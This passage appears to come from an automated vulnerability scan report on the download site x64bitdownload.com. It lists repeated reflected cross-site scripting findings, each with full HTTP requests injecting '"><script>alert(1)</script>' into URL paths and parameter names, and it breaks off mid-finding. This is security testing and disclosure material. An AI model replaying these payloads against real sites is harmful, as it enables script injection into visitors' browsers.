HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:38 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88551
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-downloads.htmld337e"><script>alert(1)</script>9b144cad06d" /> ...[SNIP]...
1.113. http://www.x64bitdownload.com/64-bit-rss-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-rss-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a417"><script>alert(1)</script>14bc0d3550a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:49:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:59:31 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88554
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-downloads.html?4a417"><script>alert(1)</script>14bc0d3550a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33d26"><script>alert(1)</script>9a97b43768b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:55:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:05:23 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93760
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html33d26"><script>alert(1)</script>9a97b43768b" /> ...[SNIP]...
1.115. http://www.x64bitdownload.com/64-bit-rss-feed-reader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-rss-feed-reader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12de"><script>alert(1)</script>770277e5ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:51:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:15 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22rss-feed-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22rss+feed+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 93763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-feed-reader-downloads.html?f12de"><script>alert(1)</script>770277e5ab7=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2159a"><script>alert(1)</script>7cc8e154fd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:07:27 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 99972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html2159a"><script>alert(1)</script>7cc8e154fd6" /> ...[SNIP]...
1.117. http://www.x64bitdownload.com/64-bit-rss-reader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-rss-reader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02c9"><script>alert(1)</script>494377cbd72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:52:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:02:34 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 99975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-rss-reader-downloads.html?d02c9"><script>alert(1)</script>494377cbd72=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19f4"><script>alert(1)</script>42c8e9318d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:44:51 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:54:54 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92023
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-search-downloads.htmlf19f4"><script>alert(1)</script>42c8e9318d8" /> ...[SNIP]...
1.119. http://www.x64bitdownload.com/64-bit-search-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-search-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bf0d"><script>alert(1)</script>f1422490e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:40:53 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:06 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22search%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 92026
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-search-downloads.html?4bf0d"><script>alert(1)</script>f1422490e1a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 378a5"><script>alert(1)</script>edb593753a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:59:14 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:09:15 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87864
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html378a5"><script>alert(1)</script>edb593753a9" /> ...[SNIP]...
1.121. http://www.x64bitdownload.com/64-bit-ssl-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-ssl-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d45f"><script>alert(1)</script>fb73e15ccb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:54:28 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:04:36 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22ssl%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-ssl-downloads.html?7d45f"><script>alert(1)</script>fb73e15ccb4=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42925"><script>alert(1)</script>83516ad106d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 16:00:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:10:32 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html42925"><script>alert(1)</script>83516ad106d" /> ...[SNIP]...
1.123. http://www.x64bitdownload.com/64-bit-synchronization-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-synchronization-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa26d"><script>alert(1)</script>59dfdd435a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:58:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:08:17 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A15%3A%22synchronization%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 90166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-synchronization-downloads.html?aa26d"><script>alert(1)</script>59dfdd435a1=1" /> ...[SNIP]...
1.124. http://www.x64bitdownload.com/64-bit-synchronize-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-synchronize-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d90"><script>alert(1)</script>34e92339c0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:50 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:08:04 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22synchronize%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91312
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-synchronize-downloads.html?72d90"><script>alert(1)</script>34e92339c0f=1" /> ...[SNIP]...
1.125. http://www.x64bitdownload.com/64-bit-troll-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-troll-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d4c"><script>alert(1)</script>b3d1287dd66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:59:53 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:10:01 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22troll%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28801
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-troll-downloads.html?b2d4c"><script>alert(1)</script>b3d1287dd66=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5baa0"><script>alert(1)</script>4b3b5d06ac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:53:08 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:03:32 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60784
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html5baa0"><script>alert(1)</script>4b3b5d06ac5" /> ...[SNIP]...
1.127. http://www.x64bitdownload.com/64-bit-use-next-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-use-next-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f665d"><script>alert(1)</script>b0fbaf8a5f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:49:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:59:21 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22use-next%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22use+next%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-use-next-downloads.html?f665d"><script>alert(1)</script>b0fbaf8a5f3=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7902c"><script>alert(1)</script>6aa1bdd3d27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-usenet-c-44-newsgroup-clients-downloads.html7902c"><script>alert(1)</script>6aa1bdd3d27 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
